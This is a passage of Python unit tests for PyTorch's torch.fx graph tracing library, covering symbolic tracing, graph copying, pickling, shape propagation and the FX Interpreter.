class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
seen_names : Set[str] = set()
for node in gm.graph.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_stack_traces(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
tracer = torch.fx.Tracer()
tracer.record_stack_traces = True
graph = tracer.trace(M())
for node in graph.nodes:
if node.op == 'output':
continue
self.assertTrue(node.stack_trace is not None)
assert 'test_fx.py' in node.stack_trace
def test_graph_unique_names_manual(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1')
c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
graph2 = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
graph2.graph_copy(graph, val_map)
seen_names : Set[str] = set()
for node in graph2.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_unpack(self):
class M(torch.nn.Module):
def forward(self, a, b):
c, d = a
return c + d + b
a = (torch.rand(1), torch.rand(1))
b = torch.rand(1)
m = M()
self.checkGraphModule(m, (a, b))
def test_native_callable(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
raise unittest.SkipTest("non-portable load_library call used in test")
# This test exercises the case where we use FX to translate from Python
# code to some native callable object
#
# For the purposes of testing, we use ElementwiseInterpreter defined
# in test_custom_class.cpp.
#
# We test that we can
# 1) Construct a native callable from FX IR
# 2) Construct a drop-in replacement module that delegates to the
# native callable rather than the original code
# 3) Run both the original code and native callable wrapper with
# equivalent results
# 4) TorchScript compile the native callable wrapper and confirm
# equivalent results with the reference
# 5) TorchScript serialize and deserialize the native callable
# and confirm equivalent results with the reference
# We use this simple Module as a reference computation
class MySimpleMod(torch.nn.Module):
def forward(self, x):
return 3.0 * x + x
msm = MySimpleMod()
# This is what a lowering pass might look like: a function that takes
# a valid nn.Module, symbolically traces it, lowers the Module to some
# representation, and wraps that representation up into another
# nn.Module instance that handles dispatch to the compiled/lowered code.
def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:
# ===== Stage 1: Symbolic trace the module =====
mod = symbolic_trace(orig_mod)
# ===== Stage 2: Lower GraphModule representation to the C++
# interpreter's instruction format ======
instructions = []
constant_idx = 0
constants = {}
fn_input_names = []
target_to_name = {
operator.add : "add",
operator.mul : "mul"
}
output_node : Optional[Node] = None
# For each instruction, create a triple
# (instruction_name : str, inputs : List[str], output : str)
# to feed into the C++ interpreter
for n in mod.graph.nodes:
target, args, out_name = n.target, n.args, n.name
assert len(n.kwargs) == 0, "kwargs currently not supported"
if n.op == 'placeholder':
# Placeholders specify function argument names. Save these
# for later when we generate the wrapper GraphModule
fn_input_names.append(target)
elif n.op == 'call_function':
assert target in target_to_name, "Unsupported call target " + target
arg_names = []
for arg in args:
if not isinstance(arg, Node):
# Pull out constants. These constants will later be
# fed to the interpreter C++ object via add_constant()
arg_name = f'constant_{constant_idx}'
constants[arg_name] = torch.tensor(
[arg] if isinstance(arg, numbers.Number) else arg)
arg_names.append(arg_name)
constant_idx += 1
else:
arg_names.append(arg.name)
instructions.append((target_to_name[target], arg_names, out_name))
elif n.op == 'output':
if output_node is not None:
raise RuntimeError('Multiple output nodes!')
output_node = n
else:
raise RuntimeError('Unsupported opcode ' + n.op)
interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()
# Load constants
for k, v in constants.items():
interpreter.add_constant(k, v)
# Specify names for positional input arguments
interpreter.set_input_names(fn_input_names)
# Load instructions
interpreter.set_instructions(instructions)
# Specify name for single output
assert isinstance(output_node.args[0], torch.fx.Node)
interpreter.set_output_name(output_node.args[0].name)
# ===== Stage 3: Create a wrapper GraphModule around the interpreter =====
class WrapperModule(torch.nn.Module):
def __init__(self, interpreter):
super().__init__()
self.interpreter = interpreter
wrapper = WrapperModule(interpreter)
# Create a graph that: 1) Takes function arguments 2) Invokes the interpreter
# 3) Returns the speficied return value
# FIXME: The following code could be greatly simplified by symbolic_trace'ing
# the wrapper with a Tracer that considers the Wrapper instance a root
# module, however, I can't get `__call__` exposed on TorchBind classes
# without it messing up Python `hasattr` for some reason. More digging
# into CPython's implementation of hasattr is probably in order...
graph = torch.fx.Graph()
# Add placeholders for fn inputs
placeholder_nodes = []
for name in fn_input_names:
placeholder_nodes.append(graph.create_node('placeholder', name))
# Get the interpreter object
interpreter_node = graph.create_node('get_attr', 'interpreter')
# Add a node to call the interpreter instance
output_node = graph.create_node(
op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))
# Register output
graph.output(output_node)
graph.lint()
# Return final GraphModule!!!
return GraphModule(wrapper, graph)
# Lower GraphModule to C++ interpreter
lowered = lower_to_elementwise_interpreter(msm)
# Compare correctness with original module
x = torch.rand(3, 4)
ref_out = msm(x)
test_out = lowered(x)
torch.testing.assert_close(test_out, ref_out)
# Test TorchScript compilation
scripted_lowered = torch.jit.script(lowered)
script_out = scripted_lowered(x)
torch.testing.assert_close(script_out, ref_out)
# Test TorchScript ser/de
import_copy = self.getExportImportCopy(scripted_lowered)
imported_out = import_copy(x)
torch.testing.assert_close(imported_out, ref_out)
def test_reserved_getattr(self):
"""Ensure that we do not name any nodes with a reserved builtin like `getattr`"""
class M(torch.nn.Module):
def forward(self, a):
return a.foo.bar.baz
m = M()
m_g = symbolic_trace(m)
m_g.graph.lint()
for node in m_g.graph.nodes:
self.assertTrue(node.name != "getattr")
def test_node_tagging(self):
class TaggingTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
n = super().create_node(kind, target, args, kwargs, name)
n.tag = 'foo'
return n
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = TaggingTracer().trace(m)
g.lint()
for n in g.nodes:
self.assertTrue(hasattr(n, 'tag'))
self.assertEqual(n.tag, 'foo')
def test_tensor_attribute(self):
class TensorAttribute(torch.nn.Module):
def __init__(self):
super().__init__()
self.tensor = torch.rand(3, 4)
def forward(self, x):
return torch.nn.functional.linear(x, self.tensor)
ta = TensorAttribute()
traced = symbolic_trace(ta)
traced(torch.rand(4, 4))
class WrapperForQualname(torch.nn.Module):
def __init__(self):
super().__init__()
self.ta = TensorAttribute()
def forward(self, x):
return torch.nn.functional.linear(x, self.ta.tensor)
wfq = WrapperForQualname()
traced2 = symbolic_trace(wfq)
traced2.graph.lint()
traced2(torch.rand(4, 4))
def test_tensor_attribute_coalseced(self):
def count_attrs(fx_module):
targets = set()
for node in traced.graph.nodes:
if node.op == 'get_attr':
targets.add(node.target)
return len(targets)
val = torch.tensor(5)
def f(x):
return x + val + val
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 1)
val2 = torch.tensor(5)
def f(x):
val = torch.tensor(5)
return x + val + val2
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 2)
def test_symbolic_trace_sequential(self):
class Simple(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
seq = torch.nn.Sequential(
Simple(),
Simple(),
Simple()
)
traced = symbolic_trace(seq)
traced.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(traced(x), seq(x))
def test_tensor_constant(self):
class ConstTensor(torch.nn.Module):
def forward(self, x):
return torch.nn.functional.linear(x, torch.zeros(3, 4))
ct = ConstTensor()
traced = symbolic_trace(ct)
traced.graph.lint()
traced(torch.rand(4, 4))
def test_pickle_graphmodule(self):
class Nested(torch.nn.Module):
def __init__(self):
super().__init__()
self.st = torch.nn.Linear(4, 4)
def forward(self, x):
return self.st(x)
n = Nested()
traced = symbolic_trace(n)
traced.graph.lint()
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(loaded(x), traced(x))
def test_pickle_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(loaded(x, y), gm(x, y))
def test_all_input_nodes(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.placeholder('x')
b : torch.fx.Node = graph.call_module('linear_mod', args=(a,))
c : torch.fx.Node = graph.get_attr('y_attr')
d : torch.fx.Node = graph.call_function(operator.add, args=(b, c))
e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0))
graph.output(e)
graph.lint()
self.assertEqual(b.all_input_nodes, [a])
self.assertEqual(c.all_input_nodes, [])
self.assertEqual(d.all_input_nodes, [b, c])
self.assertEqual(e.all_input_nodes, [d])
def test_deepcopy_graphmodule_with_transform(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
def transform(traced):
new_graph = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_value = new_graph.graph_copy(traced.graph, val_map)
relu_out = new_graph.create_node(
op='call_method', target='neg', args=(output_value,), kwargs={})
new_graph.output(relu_out)
return GraphModule(traced, new_graph)
transformed = transform(traced)
transformed.graph.lint()
copied = copy.deepcopy(transformed)
self.assertNotEqual(id(type(transformed)), id(type(copied)))
x = torch.randn(3, 4)
self.assertEqual(copied(x), transformed(x))
def test_deepcopy_with_submods_params(self):
class Bar(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
def forward(self, x):
return torch.relu(x) + self.param
class Baz(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.bar = Bar()
def forward(self, x):
return self.bar(x) - self.param
baz = Baz()
traced = symbolic_trace(baz)
traced.graph.lint()
copied = copy.deepcopy(traced)
copied.graph.lint()
def test_deepcopy_graph_with_tracer_cls(self):
class TestTracer(Tracer):
def is_leaf_module(self, module, name):
return True
g = Graph(tracer_cls=TestTracer)
x = g.placeholder("x")
g.output(x)
h = copy.deepcopy(g)
self.assertIsNotNone(h._tracer_cls)
self.assertTrue(g._tracer_cls == h._tracer_cls)
def test_unpack_list_better_error(self):
class SomeArgs(torch.nn.Module):
def forward(self, a, b):
return torch.rand(3, 4)
class UnpacksList(torch.nn.Module):
def __init__(self):
super().__init__()
self.sa = SomeArgs()
def forward(self, x : list):
return self.sa(*x)
ul = UnpacksList()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ul)
def test_unpack_dict_better_error(self):
class SomeKwargs(torch.nn.Module):
def forward(self, x=3, y=4):
return torch.rand(3, 4)
class UnpacksDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.sk = SomeKwargs()
def forward(self, x : dict):
return self.sk(**x)
ud = UnpacksDict()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ud)
def test_pretty_print_targets(self):
# Test that Graph pretty-print prints friendly name for targets
# in `operator` and `builtins`
class SomeMod(torch.nn.Module):
def forward(self, x):
return torch.add(x.foo + x.bar, 3.0)
traced = symbolic_trace(SomeMod())
graph_str = str(traced.graph)
self.assertIn('builtins.getattr', graph_str)
self.assertIn('operator.add', graph_str)
self.assertIn('torch.add', graph_str)
def test_pretty_print_node(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.param: torch.nn.Parameter = torch.nn.Parameter(
torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x: torch.Tensor, y: int = 2):
return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0)
traced = symbolic_trace(M())
all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes])
FileCheck().check("x").check("placeholder") \
.check("y").check("placeholder") \
.check("getitem").check("call_function") \
.check("param").check("get_attr") \
.check("add").check("call_function") \
.check("linear").check("call_module") \
.check("clamp").check("call_method") \
.run(all_formatted)
def test_script_tensor_constant(self):
# TorchScript seems to ignore attributes that start with `__`.
# We used to call anonymous Tensor values `__tensor_constant*`, but
# they were getting ignored by script. Now they're called
# `_tensor_constant*`
class IHaveATensorConstant(torch.nn.Module):
def forward(self, x):
return x + torch.rand(3, 4)
traced = torch.fx.symbolic_trace(IHaveATensorConstant())
torch.jit.script(traced)
def test_autowrap_functions(self):
class AutowrapFnTest(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2)
class AutowrapFnTest2(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2) + fx_int_x2(x.shape[0] / 2)
# Check function(s) are wrapped
# `int` would normally throw a TypeError as argument can't be `Proxy`
tracer = Tracer(autowrap_functions=(fx_int,))
graph = tracer.trace(AutowrapFnTest())
traced = GraphModule(tracer.root, graph, 'test')
tracer_2 = Tracer(autowrap_functions=(fx_int, fx_int_x2))
tracer_2.trace(AutowrapFnTest2())
# Test scriptability
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(4)), 2)
def test_torch_fx_len(self):
class FXLenTest(torch.nn.Module):
def forward(self, x):
return len(x)
traced = symbolic_trace(FXLenTest())
self.assertEqual(traced(torch.rand(3, 4)), 3)
# Test scriptability
scripted = torch.jit.script(FXLenTest())
self.assertEqual(scripted(torch.rand(3)), 3)
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(3)), 3)
# Test non-proxy len
class FXLenTest2(torch.nn.Module):
def __init__(self):
super().__init__()
self.l = [3, 4, 5]
def forward(self, x):
return x + len(self.l)
traced2 = symbolic_trace(FXLenTest2())
inp = torch.rand(3, 4)
self.assertEqual(traced2(inp), inp + 3.0)
self.assertIs(len, builtins.len)
def test_torch_fx_getattr(self):
class FXGetattrTest(torch.nn.Module):
def forward(self, x):
return getattr(x, 'nonexistent_attr', torch.Tensor([2, 3]))
traced = symbolic_trace(FXGetattrTest())
self.assertEqual(traced(torch.rand(3, 4)), torch.Tensor([2, 3]))
def test_sqrt(self):
class Sqrt1(torch.nn.Module):
def forward(self, x):
return sqrt(x.size(0))
class Sqrt2(torch.nn.Module):
def forward(self, x):
return math.sqrt(x.size(0))
class Sqrt3(torch.nn.Module):
def forward(self, x):
return x + math.sqrt(2) + sqrt(2)
self.checkGraphModule(Sqrt1(), [torch.zeros(8)])
self.checkGraphModule(Sqrt2(), [torch.zeros(8)])
self.checkGraphModule(Sqrt3(), [torch.zeros(8)])
self.assertIs(sqrt, _sqrt)
self.assertIs(math.sqrt, _sqrt)
def test_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
def test_pickle_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
self.assertEqual(loaded(input), gm(input))
def test_pretty_print(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
printed = str(traced)
assert 'SimpleTest()' in printed
assert 'torch.relu' in printed
def test_pretty_print_graph(self):
class KwargPrintTest(torch.nn.Module):
def forward(self, x):
return torch.squeeze(x + 3.0, dim=2)
st = KwargPrintTest()
traced = symbolic_trace(st)
traced.graph.lint()
stringed = str(traced.graph)
for s in ['args', 'kwargs', '#users']:
assert s in stringed
def test_custom_proxy_type(self):
class TensorPair:
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair(x : TensorPair, y : TensorPair):
s = x.add(y)
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair(x, y)
traced = symbolic_trace(use_tensor_pair)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_type_literal(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_literal(x : TensorPair):
s = x.add(TensorPair(torch.zeros(5, 3), torch.zeros(5, 3)))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair_literal(x)
traced = symbolic_trace(use_tensor_pair_literal)
traced_out = traced(x)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_dynamic_value(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_ctor(x : TensorPair, y : torch.Tensor):
s = x.add(TensorPair(y, y))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = torch.randn(5, 3)
ref_out = use_tensor_pair_ctor(x, y)
traced = symbolic_trace(use_tensor_pair_ctor)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_input_dependent_control_flow(self):
class ZeroTensor(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, inp):
if inp.sum() == 0:
self.is_zero = True
self.tensor = torch.tensor([])
else:
self.is_zero = False
self.tensor = inp
def add(self, other):
if self.is_zero:
return ZeroTensor(other.tensor)
elif other.is_zero:
return self
def use_zero_tensor(x : torch.Tensor, y : torch.Tensor):
return ZeroTensor(x + y)
x, y = torch.randn(5, 3), torch.randn(5, 3)
ref_out = use_zero_tensor(x, y)
traced = symbolic_trace(use_zero_tensor)
traced_out = traced(x, y)
self.assertEqual(traced_out.is_zero, ref_out.is_zero)
self.assertEqual(traced_out.tensor, ref_out.tensor)
def test_graph_fns(self):
g = Graph()
a = g.placeholder('a')
b = g.call_module('linear', (a,))
c = g.get_attr('bias')
d = g.call_method('add', (b, c))
e = g.call_function(torch.sin, (d,))
g.output(e)
mod = torch.nn.Module()
mod.linear = torch.nn.Linear(3, 4)
mod.bias = torch.rand(4)
gm = GraphModule(mod, g)
gm.graph.lint()
input = torch.rand(3)
r = gm(input)
ref = torch.sin(mod.linear(input) + mod.bias)
self.assertEqual(r, ref)
def test_remove_uses(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu)
g.erase_node(neg)
self.assertTrue(neg not in relu.users)
def test_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(3, 4)
symbolic_trace(eb)
def test_pickle_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(10, 3, mode='sum')
traced = symbolic_trace(eb)
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
self.assertEqual(loaded(input, offsets), traced(input, offsets))
def test_return_tuple(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
return (x, x + x)
original = M()
traced = symbolic_trace(original)
self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1)))
def test_construct_root_dict(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
linear_mod : torch.nn.Module = torch.nn.Linear(3, 4)
add_param : torch.Tensor = torch.rand(3, 4)
gm : torch.fx.GraphModule = torch.fx.GraphModule(
{'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph)
gm.graph.lint()
assert 'self.foo.bar.baz' in gm.code
x : torch.Tensor = torch.rand(3, 3)
out : torch.Tensor = gm(x)
ref_out : torch.Tensor = linear_mod(x) + add_param
self.assertEqual(out, ref_out)
def test_symbolic_trace_assert(self):
class AssertsTensorShape(torch.nn.Module):
def forward(self, x):
torch._assert(x.shape[1] > 4, "assert_foobar")
return x
m = AssertsTensorShape()
# verify traceability
traced = symbolic_trace(m)
# verify assertion on traced model works correctly at runtime
traced(torch.rand(4, 5))
with self.assertRaisesRegex(AssertionError, "assert_foobar"):
traced(torch.rand(4, 3))
# verify the symbolically traced module is scriptable
ms = torch.jit.script(m)
with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"):
ms(torch.rand(4, 3))
def test_fx_create_arg(self):
class CustomArgObject:
def __init__(self, x, y):
self.x = x
self.y = y
def __fx_create_arg__(self, tracer: torch.fx.Tracer):
return tracer.create_node(
"call_function",
CustomArgObject,
args=(
tracer.create_arg(self.x),
tracer.create_arg(self.y),
),
kwargs={},
)
class HasCustomArgObjectWhenLeaf(torch.nn.Module):
def forward(self, o: CustomArgObject):
# Not normally traceable; good reason to make
# this module a leaf.
for x in o.x:
o.y += x
return o.y
class Root(torch.nn.Module):
def __init__(self):
super().__init__()
self.inner = HasCustomArgObjectWhenLeaf()
def forward(self, x, y):
o = CustomArgObject(x, y)
return self.inner(o)
class CreateArgTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is HasCustomArgObjectWhenLeaf
m = Root()
graph = CreateArgTracer().trace(m)
gm = torch.fx.GraphModule(m, graph)
assert "CustomArgObject(" in gm.code
def test_trace_fn_constant(self):
some_constant = torch.rand(3, 4)
def add_const(x):
return some_constant + x
traced = symbolic_trace(add_const)
input = torch.rand(3, 4)
self.assertEqual(traced(input), add_const(input))
def test_copy_no_remap(self):
traced = symbolic_trace(SimpleTest())
g = traced.graph
copied = torch.fx.Graph()
for node in g.nodes:
copied.node_copy(node)
with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'):
copied.lint()
def test_wrong_topo(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
nodes = list(graph.nodes)
nodes[3].append(nodes[2])
with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'):
graph.lint()
def test_wrong_target_type(self):
graph : torch.fx.Graph = torch.fx.Graph()
with self.assertRaises(ValueError):
n = torch.fx.Node(graph=graph, name='foo', op='call_function', target='foo',
args=(), kwargs={})
def test_example_shape_prop(self):
class TestCase(torch.nn.Module):
def __init__(self):
super().__init__()
self.attr = torch.randn(3, 4)
self.submod = torch.nn.Linear(4, 4)
def forward(self, x):
return torch.neg(self.submod(x.relu() + self.attr))
tc = TestCase()
tc_traced = symbolic_trace(tc)
ref_out = tc_traced(torch.rand(3, 4))
shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4))
# Make sure we're testing all opcodes
opcodes = set()
output_shape : Optional[torch.Shape] = None
output_stride : Optional[Tuple[int]] = None
for node in tc_traced.graph.nodes:
opcodes.add(node.op)
if node.op == 'output':
output_shape = node.args[0].meta['tensor_meta'].shape
output_stride = node.args[0].meta['tensor_meta'].stride
self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method',
'call_module', 'output']))
# Test shape propogation and make sure results match actual
self.assertEqual(output_shape, ref_out.shape)
self.assertEqual(output_stride, ref_out.stride())
def test_shape_prop_layout(self):
class ConvTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv2d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
# contiguous layout
test_mod = ConvTest()
traced = symbolic_trace(test_mod)
x = torch.randn(5, 5, 224, 224)
shape_prop.ShapeProp(traced).propagate(x)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced.graph.nodes))
x_channels_last = x.contiguous(memory_format=torch.channels_last)
traced.to(memory_format=torch.channels_last)
shape_prop.ShapeProp(traced).propagate(x_channels_last)
for node in traced.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last)
def test_shape_prop_aggregate(self):
class ReturnTwo(torch.nn.Module):
def forward(self, x):
return (3, torch.sum(x))
class UnderTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.rt = ReturnTwo()
def forward(self, x):
return self.rt(x)
ut = UnderTest()
class RTTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is ReturnTwo
graph = RTTracer().trace(ut)
mod = torch.fx.GraphModule(ut, graph)
shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4))
for node in mod.graph.nodes:
if node.op == 'call_module':
assert 'tensor_meta' in node.meta
tensor_meta = node.meta['tensor_meta']
assert tensor_meta[0] == 3
assert tensor_meta[1].shape == torch.Size([])
def test_shape_prop_layout_3d(self):
class ConvTest3d(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv3d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
test_mod_3d = ConvTest3d()
traced_3d = symbolic_trace(test_mod_3d)
x_3d = torch.randn(5, 5, 224, 224, 15)
shape_prop.ShapeProp(traced_3d).propagate(x_3d)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced_3d.graph.nodes))
x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d)
traced_3d.to(memory_format=torch.channels_last_3d)
shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d)
for node in traced_3d.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d)
def test_interpreter(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
interpreter = Interpreter(gm)
input = torch.randn(3, 4)
self.assertEqual(interpreter.run(input), gm(input))
self.assertEqual(interpreter.run(input), m(input))
def test_interpreter_run_node_override(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
class RunNodeInterpreter(Interpreter):
def __init__(self, module):
super().__init__(module)
def run_node(self, n : Node) -> Any:
result = super().run_node(n)
n.cached_value = result
return result
input = torch.randn(3, 4)
RunNodeInterpreter(gm).run(input)
for node in gm.graph.nodes:
assert hasattr(node, 'cached_value')
def test_interpreter_onthefly_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapInterpreter(Interpreter):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
input = torch.randn(3, 4)
result = NegSigmSwapInterpreter(gm).run(input)
self.assertEqual(result, torch.neg(input).sigmoid())
def test_interpreter_partial_eval(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
gm = torch.fx.symbolic_trace(MyModule())
interp = Interpreter(gm)
env = {}
for node in gm.graph.nodes:
if node.op == 'call_module' and node.target == 'linear':
env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0
break
assert len(env) == 1
x = torch.randn(3, 4)
result = interp.run(x, initial_env=env)
self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0))
def test_interpreter_star_args(self):
def with_star_args(x, *args):
return x + args[0]
gm = torch.fx.symbolic_trace(with_star_args)
interp = Interpreter(gm)
